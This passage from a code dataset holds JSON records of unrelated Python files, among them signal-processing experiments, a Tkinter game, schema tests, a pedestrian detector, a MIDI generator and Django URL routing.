easygui.fileopenbox()\ntry:\n data = genfromtxt(filename, delimiter=',')\nexcept:\n sys.exit()\n\n# data = np.round(data, 1)\n\n# arbitrary time\nt = list(range(0,len(data)))\n\n# actual x\nx_actual = data[:,1]\n#actual y\ny_actual = data[:,2]\n\nx_commanded = data[:,4]\ny_commanded = data[:,6]\n\nfig, (ax1, ax2, ax3) = plt.subplots(3, constrained_layout=True)\nfig.suptitle('X and Y')\nax1.plot(t,x_actual)\nax1.plot(t,x_commanded)\nax1.set_title('X(Surge) over time')\nax2.plot(t,y_actual)\nax2.plot(t,y_commanded)\nax2.set_title('Y(Sway) over time')\n#X being north or 'up' so more like Y\nax3.plot(y_actual,x_actual)\nax3.plot(y_commanded,x_commanded)\nax3.set_title('X vs Y')\nplt.show()\n#plt.axis([0,len(x_actual)-1, min(x_actual) - abs((min(x_actual)/4)) ,max(x_actual) + abs((max(x_actual)/4))])\n\n\n","repo_name":"Ben-Bartlett/ArduSub_Dynamic_Positioning","sub_path":"development/plot_xy.py","file_name":"plot_xy.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4529484789","text":"class PeriodicString:\n \"\"\"\n Find whether string S is periodic.\n Periodic indicates S = nP.\n e.g.\n S = \"ababab\", then n = 3, and P = \"ab\"\n S = \"xxxxxx\", then n = 1, and P = \"x\"\n S = \"aabbaaabba\", then n = 2, and P = \"aabba\"\n\n Given string S, find out the P (repetitive pattern) of S.\n \"\"\"\n\n def repeted_substring(self, str):\n N = len(str)\n _pattern = str[0]\n if N == 1:\n return str\n else:\n for i in range(N//2, 1, -1):\n if N % i == 0:\n if str[:i]*int(N//i) == str and str[:i] != str[0] * (i):\n if len(str[:i]) > len(_pattern):\n _pattern = str[:i]\n return _pattern\n\nps = PeriodicString()\nstr=\"ababab\"\n# str = 'xxxxxx'\n# str = \"aabbaaabba\"\n# str = \"blah\"\nprint(\"Repeted substring is: {} for string: {}\".format(\n ps.repeted_substring(str), str))\n","repo_name":"MichaelArslangul/python_Sandbox","sub_path":"PeriodicStrings.py","file_name":"PeriodicStrings.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9907652840","text":"\"\"\"program to print out list of names right alligned\r\nvuyolwethu nkosi\r\n23 april 2014\"\"\"\r\n\r\n#create empty list\r\nstring=[]\r\n#get list from user\r\nstrings=input(\"Enter strings (end with DONE):\\n\")\r\nwhile strings!=\"DONE\":\r\n string.append (strings)\r\n strings=input(\"\")\r\n#convert every string to its lengths\r\n#create list of lengths\r\nstring_1=[]\r\nfor i in range(len(string)):\r\n string_1.append (len(string[i]))\r\n#print(string_1)\r\nprint(\"\\nRight-aligned list:\")\r\nif string_1==[]:\r\n print()\r\nelse:\r\n x=max(string_1) #getting maximum length\r\nfor i in string:\r\n y=\" \"*(x-(len(i))) #print spaces equivalent to the maximum word length minus the word being used\r\n print(y,i,sep=\"\") #print spaces and then word\r\n \r\n \r\n \r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/nksvuy001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6523035723","text":"from tkinter import *\nfrom UI import UI\nfrom Bowl import Bowl\nfrom Fruit import Fruit\nfrom time import *\n#from RaspberrySenseHat import RaspberrySenseHat\n#from sense_hat import SenseHat \nclass Game:\n\n\tdef __init__(self):\n\t\t#self.sense = SenseHat()\n\t\tself.interface=UI(self)\n\t\tself.interface.displayMainMenu()\n\t\tself.listFruit=[]\n\t\tself.interface.root.TkMenu.mainloop()\n\t\tself.victory\n\t\t\n\tdef fruitFactory(self) :\n\t\tif(not self.victory): \n\t\t\tself.listFruit.append(Fruit(self.interface.getMenu()))\n\t\t\tif(not self.i<1000):\n\t\t\t\tself.i-=40\n\t\t\tself.interface.getMenu().TkMenu.after(self.i,self.fruitFactory)\n\t\t\t\n\tdef fruitFalling(self) : \n\t\tif(not self.victory):\n\t\t\tfor fruit in self.listFruit :\n\t\t\t\tFruit.moveDown(fruit,self.interface)\n\t\t\t\tif(Fruit.verifyCollisionBowl(fruit,self.bowl)):\n\t\t\t\t\tself.score+=fruit.point\n\t\t\t\t\t#self.SenseHat.add(fruit.color, fruit.point)\n\t\t\t\t\tself.listFruit.remove(fruit)\n\t\t\t\t\tself.victory=(self.score>=64)\n\t\t\t\telif(Fruit.verifyCollisionGround(fruit,self.interface.menu.taille)):\n\t\t\t\t\tself.listFruit.remove(fruit)\n\t\t\t\t\tself.life-=1\n\t\t\t\t\tif(self.life==2):\n\t\t\t\t\t\tself.interface.getMenu().canvasVie1.configure(bg=\"white\")\n\t\t\t\t\telif(self.life==1):\n\t\t\t\t\t\tself.interface.getMenu().canvasVie2.configure(bg=\"white\")\n\n\t\t\t\t\tprint(self.life)\n\t\t\t\t\tif(self.life==0):\n\t\t\t\t\t\tself.loose()\n\t\t\tif(not self.victory):\n\t\t\t\tself.interface.getMenu().TkMenu.after(60,self.fruitFalling)\n\t\t\telse :\n\t\t\t\tself.win()\n\n\tdef loop(self):\n\t\torientation = self.sense.get_orientation()\n\t\tpitch = orientation['pitch']\n\t\tif pitch > 25 and pitch <=90:\n\t\t\tself.bowl.move(\"right\")\n\t\telif pitch<335 and pitch>270:\n\t\t\tself.bowl.move(\"left\")\n\t\tself.interface.getMenu().TkMenu.after(5,self.loop)\n \n\n\tdef play(self):\n\t\tprint(\"Play !\")\n\t\tself.i=2000\n\t\tself.life=3\n\t\tself.victory=False\n\t\tself.score=0\n\t\t#self.SenseHat = RaspberrySenseHat()\n\t\tself.interface.displayGameMenu()\n\t\tself.bowl=Bowl(self.interface.getMenu())\n\t\tself.interface.getMenu().TkMenu.bind('<KeyPress-Left>',lambda event :self.bowl.move(\"left\"))\n\t\tself.interface.getMenu().TkMenu.bind('<KeyPress-Right>',lambda event :self.bowl.move(\"right\"))\n\t\tself.fruitFactory()\n\t\tself.fruitFalling()\n\t\t#self.loop()\n\n\tdef win(self):\n\t\tprint(\"well play ! you won\")\n\t\tself.interface.displayWinMenu()\n\tdef loose(self):\n\t\tprint(\"you loose\")\n\t\tself.interface.displayLooseMenu()\n\ngame=Game()\n\n\n\n\n","repo_name":"NicolasGuruphat/dizzy-fruti_A-Raspberry-pi-project","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30726757192","text":"\"\"\"empty message\n\nRevision ID: ff81e71455ea\nRevises: d3461e6dc169\nCreate Date: 2020-10-13 06:55:13.271211\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'ff81e71455ea'\ndown_revision = 'd3461e6dc169'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('past_shows', sa.Integer(), nullable=True))\n op.add_column('Venue', sa.Column('upcoming_shows', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'Venue', 'Show', ['past_shows'], ['id'])\n op.create_foreign_key(None, 'Venue', 'Show', ['upcoming_shows'], ['id'])\n op.drop_column('Venue', 'genres')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('genres', postgresql.ARRAY(sa.VARCHAR()), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'Venue', type_='foreignkey')\n op.drop_constraint(None, 'Venue', type_='foreignkey')\n op.drop_column('Venue', 'upcoming_shows')\n op.drop_column('Venue', 'past_shows')\n # ### end Alembic commands ###\n","repo_name":"Heila-Almogren/Fyyur","sub_path":"projects/01_fyyur/starter_code/migrations/versions/ff81e71455ea_.py","file_name":"ff81e71455ea_.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12235476619","text":"import numpy as np\nimport scipy.signal as signal\nfrom subfunction.Constellation import *\nfrom subfunction.DataNormalize import *\nfrom subfunction.Histogram2D import *\nfrom subfunction.IQimbaCompensator import *\n# from subfunction.corr import *\nfrom subfunction.BERcount import *\nfrom subfunction.SNR import *\nfrom subfunction.Downsample import *\n\nfrom CMA import *\n\nfrom KENG_Tx2Bit import *\nfrom KENG_downsample import *\nfrom KENG_phaserecovery import *\nfrom KENG_Parameter_16QAM import *\nfrom KENG_phaserecovery import *\nfrom KENG_correlation import *\n\nfrom Equalizer import *\nfrom Phaserecovery import *\n\n\nparameter = Parameter(r'data\\20200811_finisar B2B16QAM\\Vblock1.mat',simulation=False)\n\n\nprint('SymbolRate={}'.format(parameter.symbolRate / 1e9), 'Pamorder={}'.format(parameter.pamorder),\n 'resamplenumber={}'.format(parameter.resamplenumber))\nprint('Tx Length={}'.format(len(parameter.TxXI)), 'Rx Length={}'.format(len(parameter.RxXI)))\n# Tx Normalize\nTx2bit=KENG_Tx2Bit(PAM_order=4)\n\n\nTxXI ,TxXQ = DataNormalize(parameter.TxXI,parameter.TxXQ,parameter.pamorder)\nTxYI ,TxYQ = DataNormalize(parameter.TxYI,parameter.TxYQ,parameter.pamorder)\n\nTxXI=Tx2bit.return_Tx(TxXI)\nTxXQ=Tx2bit.return_Tx(TxXQ)\nTxYI=Tx2bit.return_Tx(TxYI)\nTxYQ=Tx2bit.return_Tx(TxYQ)\n\nTx_Signal_X=Constellation(TxXI,TxXQ,parameter.pamorder)\nTx_Signal_Y=Constellation(TxYI,TxYQ,parameter.pamorder)\nHistogram2D('Tx',Tx_Signal_X[0:10000])\n# Rx Upsample\nRx_XI, Rx_XQ = DataNormalize(signal.resample_poly(parameter.RxXI, up=parameter.upsamplenum, down=1),\n signal.resample_poly(parameter.RxXQ, up=parameter.upsamplenum, down=1),\n parameter.pamorder)\nRx_YI, Rx_YQ = DataNormalize(signal.resample_poly(parameter.RxYI, up=parameter.upsamplenum, down=1),\n signal.resample_poly(parameter.RxYQ, up=parameter.upsamplenum, down=1),\n parameter.pamorder)\n\nprint('Tx_Resample Length={}'.format(len(Tx_Signal_X)), 'Rx_Resample Length={}'.format(len(Rx_XI)))\nprbs = np.ceil(DataNormalize(parameter.PRBS, [], parameter.pamorder))\nsnrscan = np.zeros((parameter.resamplenumber, 1))\nevmscan = np.zeros((parameter.resamplenumber, 1))\n\n#Eye position scan2\nfor eyepos in range(7,8):\n down_num = eyepos\n Rx_XI_eye = signal.resample_poly(Rx_XI[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_XQ_eye = signal.resample_poly(Rx_XQ[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_YI_eye = signal.resample_poly(Rx_YI[down_num:], up=1, down=parameter.resamplenumber / 2)\n Rx_YQ_eye = signal.resample_poly(Rx_YQ[down_num:], up=1, down=parameter.resamplenumber / 2)\n \n Rx_Signal_X = Constellation(Rx_XI_eye, Rx_XQ_eye, parameter.pamorder)\n Rx_Signal_Y = Constellation(Rx_YI_eye, Rx_YQ_eye, parameter.pamorder)\n Histogram2D('Rx', Rx_Signal_X[0:32767])\n \n \n cma = CMA(Rx_Signal_X[:200000], Rx_Signal_Y[:200000])\n # cma = CMA(Rx_Signal_X, Rx_Signal_Y)\n print('CMA Batch Size={}'.format(cma.batchsize), 'CMA Stepsize={}'.format(cma.stepsize),\n 'CMA OverHead={}%'.format(cma.overhead * 100))\n # CMA Single\n # cma.run_single()\n # Rx_X_CMA, Rx_Y_CMA = Downsample(cma.rx_x_single, 2), Downsample(cma.rx_y_single, 2)\n # print(np.shape(Rx_X_CMA), cma.costfunx, cma.costfuny)\n # Histogram2D(Rx_X_CMA[cma.center:32767-cma.center+1])\n # CMA Batch\n cma.run_16qam()\n Rx_X_CMA, Rx_Y_CMA = Downsample(cma.rx_x_cma, 2, cma.center), Downsample(cma.rx_y_cma, 2, cma.center)\n print(cma.costfunx[0][0:10])\n Histogram2D('CMA', Rx_X_CMA[0])\n Rx_X_iqimba = IQimbaCompensator(Rx_X_CMA, 1e-4)\n Histogram2D(\"IQimba\", Rx_X_iqimba[0])\n \n \n phaserec = Phaserecovery(Rx_X_iqimba)\n # Rx_X_recovery, B, C = phaserec.PLL_(0.01, 0.707)\n Rx_X_recovery = phaserec.DD_PLL()\n Histogram2D('DD-PLL', Rx_X_recovery[0])\n\n ph=KENG_phaserecovery()\n # PLL_Rx=ph.QAM_4(Rx_X_iqimba[0],c1_radius=math.sqrt(2)+math.sqrt(2)/2,c2_radius=(math.sqrt(10)+math.sqrt(18))/2) \n # PLL_Rx=ph.QAM(Rx_X_iqimba[0],c1_radius=math.sqrt(2),c2_radius=math.sqrt(10))\n PLL_Rx=ph.QAM_4(Rx_X_iqimba[0],c1_radius=math.sqrt(2),c2_radius=math.sqrt(10))\n Histogram2D('KENG_PLL_ML',PLL_Rx[:,0]) \n \n \n Correlation=KENG_corr(window_length=150)\n Rx_real, Tx_real=Correlation.calculate_Rx(np.real(PLL_Rx[0:60000,0]),TxXI[0:60000]) \n Rx_imag, Tx_imag=Correlation.calculate_Rx(np.imag(-PLL_Rx[0:60000,0]),TxXQ[0:60000]) \n # Rx_real, Tx_real=Correlation.calculate_Rx(np.real(Rx_X_recovery[0,0:80000]),TxXI[0:80000]) \n # Rx_imag, Tx_imag=Correlation.calculate_Rx(np.imag(-Rx_X_recovery[0,0:80000]),TxXQ[0:80000]) \n\n\n # Rx_corr,Tx_corr=Correlation.calculate_Rx(PLL_Rx[0:90000,0],Tx_Signal_X[0:90000]) \n # snr, evm = SNR(np.array(Rx_corr[0:10000,0]), np.array(Tx_corr[0:10000,0]))\n # print(snr, evm)\n # Rx_real, Tx_real = corr(np.real(PLL_Rx[:,0]), TxXI[:,0], parameter.Prbsnum)\n # Rx_imag, Tx_imag = corr(np.imag(PLL_Rx[:,0]), TxXQ[:,0], parameter.Prbsnum)\n \n Rx_corr = Rx_real[0:35000] + 1j * Rx_imag[0:35000]\n Tx_corr = Tx_real[0:35000] + 1j * Tx_imag[0:35000]\n \n \n # Rx_corr, Tx_corr = corr(PLL_Rx[:,0], Tx_Signal_X, parameter.Prbsnum)\n # Rx_real, Tx_real = corr(np.real(Rx_X_recovery[0]), np.real(Tx_Signal_X), parameter.Prbsnum)\n # Rx_imag, Tx_imag = corr(np.imag(Rx_X_recovery[0]), np.imag(Tx_Signal_X), parameter.Prbsnum)\n # Rx_corr = Rx_real + 1j * Rx_imag\n # Tx_corr = Tx_real + 1j * Tx_imag\n # snr, evm = SNR(Rx_corr,Tx_corr)\n snr, evm = SNR(np.array(Rx_corr.T[0,:]), np.array(Tx_corr.T[0,:]))\n # bercount = BERcount(np.array(Tx_corr), np.array(Rx_corr), parameter.pamorder)\n # print(bercount)\n print(snr, evm)\n # snrscan[eyepos] = snr\n # evmscan[eyepos] = evm\n# print(np.max(snrscan), np.argmax(snrscan))\n#---\nequalizer_real = Equalizer(np.real(np.array(Tx_corr.T)[0,:]), np.real(np.array(Rx_corr.T)[0,:]), 3, [11, 31, 31], 0.5)\nequalizer_imag = Equalizer(np.imag(np.array(Tx_corr.T)[0,:]), np.imag(np.array(Rx_corr.T)[0,:]), 3, [11, 31, 31], 0.5)\nTx_volterra_real, Rx_volterra_real = equalizer_real.realvolterra()\nTx_volterra_imag, Rx_volterra_imag = equalizer_imag.realvolterra()\nTx_real_volterra = Tx_volterra_real + 1j * Tx_volterra_imag\nRx_real_volterra = Rx_volterra_real + 1j * Rx_volterra_imag\n#---\n# equalizer_complex = Equalizer(Tx_corr, Rx_corr, 3, [11, 3, 3], 0.5)\n# equalizer_complex = Equalizer( np.array(Tx_corr.T)[0,:], np.array(Rx_corr.T)[0,:], 3, [21, 3, 1], 0.1)\n\n# equalizer_real = Equalizer(np.real(Tx_corr), np.real(Rx_corr), 3, [11, 11, 11])\n# equalizer_imag = Equalizer(np.imag(Tx_corr), np.imag(Rx_corr), 3, [11, 11, 11])\n# Tx_volterra_real, Rx_volterra_real = equalizer_real.realvolterra()\n# Tx_volterra_imag, Rx_volterra_imag = equalizer_imag.realvolterra()\n# Tx_real_volterra = Tx_volterra_real + 1j * Tx_volterra_imag\n# Rx_real_volterra = Rx_volterra_real + 1j * Rx_volterra_imag\n# Tx_complex_volterra, Rx_complex_volterra = equalizer_complex.complexvolterra()\nsnr_volterra, evm_volterra = SNR(Tx_real_volterra, Rx_real_volterra)\n# snr_volterra, evm_volterra = SNR(Rx_complex_volterra, Tx_complex_volterra)\n# bercount = BERcount(Rx_complex_volterra, Tx_complex_volterra, parameter.pamorder)\n# bercount = BERcount(Tx_complex_volterra, Rx_complex_volterra, parameter.pamorder)\n# print(bercount)\nprint(snr_volterra, evm_volterra)\nHistogram2D(\"ComplexVolterra\", Rx_real_volterra, snr_volterra, evm_volterra)\n# if __name__ == '__main__':\n# main()","repo_name":"KENGQQ/pycharm_coherent_64QAM","sub_path":"QAM_exp.py","file_name":"QAM_exp.py","file_ext":"py","file_size_in_byte":7497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6120861977","text":"\"\"\"Test Order Charge validation.\"\"\"\nfrom briefy.leica.models.job.order import OrderCharge\nfrom briefy.leica.models.job.order import OrderCharges\n\nimport colander\nimport pytest\n\n\nvalid_data = (\n ('rescheduling', 1200, '', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('cancellation', 0, 'Foo bar', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('model_release', 123000, '20 people', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('property_release', 3000, 'Owner signed', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('other', 3000, 'Other reason', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n ('other', 3000, 'Other reason', '669a99c2-9bb3-443f-8891-e600a15e3c10', '', '', ''),\n)\n\n\n@pytest.mark.parametrize('data', valid_data)\ndef test_order_charge_serialization(data):\n \"\"\"Test successful OrderCharge serialization.\"\"\"\n payload = {\n 'category': data[0], 'amount': data[1], 'reason': data[2], 'created_by': data[3],\n 'id': data[4], 'invoice_number': data[5], 'invoice_date': data[6],\n }\n schema = OrderCharge()\n response = schema.deserialize(payload)\n assert response['category'] == payload['category']\n assert response['amount'] == payload['amount']\n assert response['reason'] == payload['reason']\n assert response['created_by'] == payload['created_by']\n assert response['id'] is not None\n\n\nwrong_data = (\n ('wrong_reason', 1200, '', '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 'wrong', 'Foo bar', '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 123000, 123, '669a99c2-9bb3-443f-8891-e600a15e3c10'),\n ('work', 123000, '', 'meu_login'),\n)\n\n\n@pytest.mark.parametrize('data', wrong_data)\ndef test_order_charge_serialization_failure(data):\n \"\"\"Test failed OrderCharge serialization.\"\"\"\n payload = {'category': data[0], 'amount': data[1], 'reason': data[2], 'created_by': data[3]}\n schema = OrderCharge()\n with pytest.raises(colander.Invalid):\n schema.deserialize(payload)\n\n\nvalid_charges = (\n valid_data,\n)\n\n\n@pytest.mark.parametrize('data', valid_charges)\ndef test_order_charges_serialization(data):\n \"\"\"Test successful OrderCharges serialization.\"\"\"\n payload = [\n {'category': i[0], 'amount': i[1], 'reason': i[2], 'created_by': i[3]}\n for i in data\n ]\n schema = OrderCharges()\n response = schema.deserialize(payload)\n assert len(response)\n assert response[0]['category'] == payload[0]['category']\n assert response[0]['amount'] == payload[0]['amount']\n assert response[0]['reason'] == payload[0]['reason']\n assert response[0]['created_by'] == payload[0]['created_by']\n assert response[0]['id'] is not None\n\n\ninvalid_charges = (\n wrong_data,\n)\n\n\n@pytest.mark.parametrize('data', invalid_charges)\ndef test_order_charges_serialization_failure(data):\n \"\"\"Test failed OrderCharges serialization.\"\"\"\n payload = [\n {'category': i[0], 'amount': i[1], 'reason': i[2], 'created_by': i[3]}\n for i in data\n ]\n schema = OrderCharges()\n with pytest.raises(colander.Invalid):\n schema.deserialize(payload)\n","repo_name":"BriefyHQ/briefy.leica","sub_path":"tests/models/job/test_order_charges.py","file_name":"test_order_charges.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13440733803","text":"import random\n\nfrom db.run_sql import run_sql\n\nfrom models.pub import Pub\n\ndef save(pub):\n sql = \"INSERT INTO pubs (name) VALUES (%s) RETURNING *\"\n values = [pub.name]\n results = run_sql(sql, values)\n id = results[0]['id']\n pub.id = id\n\ndef select_all():\n pubs = []\n\n sql = \"SELECT * FROM pubs\"\n results = run_sql(sql)\n\n for row in results:\n pub = Pub(row['name'], row['id'])\n pubs.append(pub)\n\n return pubs\n\ndef delete_all():\n sql = \"DELETE FROM pubs\"\n run_sql(sql)\n\ndef get_pub(pubs):\n return random.choice(pubs)\n","repo_name":"hudhill/random_pub2.0","sub_path":"repositories/pub_repository.py","file_name":"pub_repository.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31468753350","text":"def saude_financeira():\r\n \r\n #receber os dados de renda e gastos do usuário\r\n renda_total = float(input(\"Informe sua renda mensal total: \"))\r\n moradia = float(input(\"Informe seus gastos mensais com moradia: \"))\r\n educacao = float(input(\"Informe seus gastos mensais com educação: \"))\r\n transporte = float(input(\"Informe seus gastos mensais com transporte: \"))\r\n \r\n #calcular a porcentagem de cada um dos gastos em relação à renda total\r\n percentual_moradia = (moradia/renda_total)*100 \r\n percentual_educ = (educacao/renda_total)*100\r\n percentual_transp = (transporte/renda_total)*100\r\n \r\n #arredondar para 2 casas decimais\r\n percentual_moradia = round(percentual_moradia,2)\r\n percentual_educ = round(percentual_educ,2)\r\n percentual_transp = round(percentual_transp,2)\r\n \r\n #calcular qual deveria ser o máximo de cada gasto em relação à renda total\r\n max_moradia = renda_total*0.3\r\n max_educ = renda_total*0.2\r\n max_transp = renda_total*0.15\r\n \r\n #arredondar para 2 casas decimais\r\n max_moradia = round(max_moradia,2)\r\n max_educ = round(max_educ,2)\r\n max_transp = round(max_transp,2)\r\n \r\n print(f\"\\nDiagnóstico:\")\r\n print(f\"Sua renda total é R${renda_total}.\\n\")\r\n \r\n #verificar se estão acima do máximo ideal (30%, 20% e 15%, respectivamente)\r\n print(f\"Seus gastos mensais com moradia equivalem a {percentual_moradia}% da sua renda total. O máximo recomendado é de 30%.\", end=' ')\r\n if percentual_moradia > 30:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com moradia deveria ser de R$ {max_moradia}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")\r\n \r\n print(f\"Seus gastos mensais com educação equivalem a {percentual_educ}% da sua renda total. O máximo recomendado é de 20%.\", end = ' ')\r\n if percentual_educ > 20:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com educação deveria ser de R$ {max_educ}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")\r\n \r\n print(f\"Seus gastos mensais com transporte equivalem a {percentual_transp}% da sua renda total. O máximo recomendado é de 15%.\", end = ' ')\r\n if percentual_transp > 15:\r\n print(f\"Idealmente, o máximo de sua renda comprometida com transporte deveria ser de R$ {max_transp}.\")\r\n else:\r\n print(\"Seus gastos estão dentro da margem recomendada.\")","repo_name":"thais-gsc/at-python","sub_path":"questao3_AT.py","file_name":"questao3_AT.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8196057098","text":"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport pickle\r\nimport time\r\n\r\n\r\nclass PedestrianDetection(object):\r\n def __init__(self, img_dir='DIR/pd_2.jpg'):\r\n self.img_dir = img_dir\r\n self.img = self.get_data(self.img_dir) # Image list, address\r\n # print(self.img.shape)\r\n self.img = cv.resize(self.img, (500, 300))\r\n # print(self.img.shape)\r\n self.hog = self.def_hog()\r\n self.clf = self.get_clf()\r\n self.detection()\r\n cv.destroyAllWindows()\r\n\r\n @staticmethod\r\n def get_data(img_dir):\r\n return cv.imread(img_dir)\r\n\r\n @staticmethod\r\n def get_clf():\r\n # print(\"Loading the model\", end='')\r\n with open('model.pickle', 'rb') as f:\r\n _clf = pickle.load(f)\r\n # print(\" ...\")\r\n return _clf\r\n\r\n def detection(self):\r\n # print(\"Detecting the pedestrians ...\")\r\n x_axis = self.img.shape[0]\r\n # print(x_axis)\r\n y_axis = self.img.shape[1]\r\n end_point = (x_axis - 160, y_axis - 96)\r\n # print(end_point)\r\n img_gray = cv.cvtColor(self.img, cv.COLOR_RGB2GRAY)\r\n # print(\"Prediction:\")\r\n for x in range(end_point[0])[::80]:\r\n for y in range(end_point[1])[::48]:\r\n img_window = img_gray[x: x+160, y: y+96]\r\n if img_window.shape != (160, 96):\r\n pass\r\n # print(\"Warning! the picture is wrong!\")\r\n window_hog = np.reshape(self.hog.compute(img_window), (1, 7524))\r\n prediction = self.clf.predict(window_hog)\r\n # cv.imshow(\"test\", img_window)\r\n # cv.waitKey()\r\n # print(prediction, end='')\r\n if prediction == 1:\r\n # print(x, y)\r\n cv.rectangle(self.img, (y, x), (y+96, x+160), (0, 255, 0), 2)\r\n # print(\"\\nThe result of PD has been shown.\")\r\n cv.namedWindow('PD result', cv.WINDOW_AUTOSIZE)\r\n cv.imshow(\"PD result\", self.img)\r\n cv.waitKey()\r\n\r\n def def_hog(self):\r\n _feature = 0\r\n # print(\"Initializing HOG descriptor...\")\r\n winsize = (96, 160)\r\n # print(\" window size:\", winsize)\r\n blocksize = (16, 16)\r\n blockstride = (8, 8)\r\n cellsize = (8, 8)\r\n nbins = 9\r\n hog = cv.HOGDescriptor(winsize,\r\n blocksize,\r\n blockstride,\r\n cellsize,\r\n nbins)\r\n return hog\r\n\r\n\r\nstart = time.time()\r\nstep_1 = PedestrianDetection()\r\nstop = time.time()\r\nprint(\"Total time:\", stop - start)\r\n","repo_name":"SaoYear/gender_surveillance","sub_path":"pedestrian_detection/HOG+SVM_demo.py","file_name":"HOG+SVM_demo.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17281537326","text":"#!/usr/bin/python3\n\nimport sys\nfrom pyknon.genmidi import Midi\nfrom pyknon.music import Note, NoteSeq, Rest\nfrom PIL import ImageFont, ImageDraw, Image\n\nfont = ImageFont.truetype(\"/usr/share/fonts/dejavu/DejaVuSans-Oblique.ttf\", 12)\n\nsentence = sys.argv[1]\ninstrument_high = 2\ninstrument_low = 25\n\nimage = Image.new(\"L\", (800,12))\ndraw = ImageDraw.Draw(image)\ndraw.text((0, -1), sentence, font=font, fill=\"white\")\n\nnotes_list_high = []\nnotes_list_low = []\nfor x in range(0,800):\n notes = []\n for y in range(0,12):\n vol = int(image.getpixel((x, y))/2)\n if vol == 127:\n continue\n if vol:\n notes.append(Note(y, 5, 1/16, vol))\n if len(notes):\n seq = NoteSeq(notes)\n notes_list_high.append(NoteSeq(notes[0].harmonize(seq)))\n if len(notes) > 1:\n notes_list_low.append(NoteSeq(notes[len(notes)-1].harmonize(seq)))\n else:\n notes_list_low.append(Rest(1/16))\n else:\n notes_list_high.append(Rest(1/32))\n notes_list_low.append(Rest(1/32))\n\nmidi = Midi(tempo=90, instrument=instrument_high)\nmidi.seq_chords(notes_list_high)\nmidi.write(\"test-high.mid\")\n\nmidi = Midi(tempo=90, instrument=instrument_low)\nmidi.seq_chords(notes_list_low)\nmidi.write(\"test-low.mid\")\n\n","repo_name":"dbordak/txt2noise","sub_path":"txt2noise-single.py","file_name":"txt2noise-single.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"2846082725","text":"\"\"\"backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include\nfrom rest_framework.documentation import include_docs_urls\nfrom rest_framework.routers import DefaultRouter\n\nfrom users.views import LoginViewset, SignupViewSet, ProfileViewset, UsersViewset\nfrom videos.views import VideoViewset, FeedViewset, VideoRecommendedViewset\nfrom operations.views import CommentsViewset, VideoDislikeViewset, VideoLikeViewset, SubscriptionViewset, VideosLikedViewset, ViewsViewset, VideosViewedViewset, ChannelRecommendedViewset\n\nrouter = DefaultRouter()\n\nrouter.register(r'signup', SignupViewSet, basename = 'signup')\nrouter.register(r'profile', ProfileViewset, basename='profile')\nrouter.register(r'videos', VideoViewset, basename='videos')\nrouter.register(r'users', UsersViewset, basename = 'users')\nrouter.register(r'comments', CommentsViewset, basename = 'comments')\nrouter.register(r'videolike', VideoLikeViewset, basename = 'videolike')\nrouter.register(r'videodislike', VideoDislikeViewset, 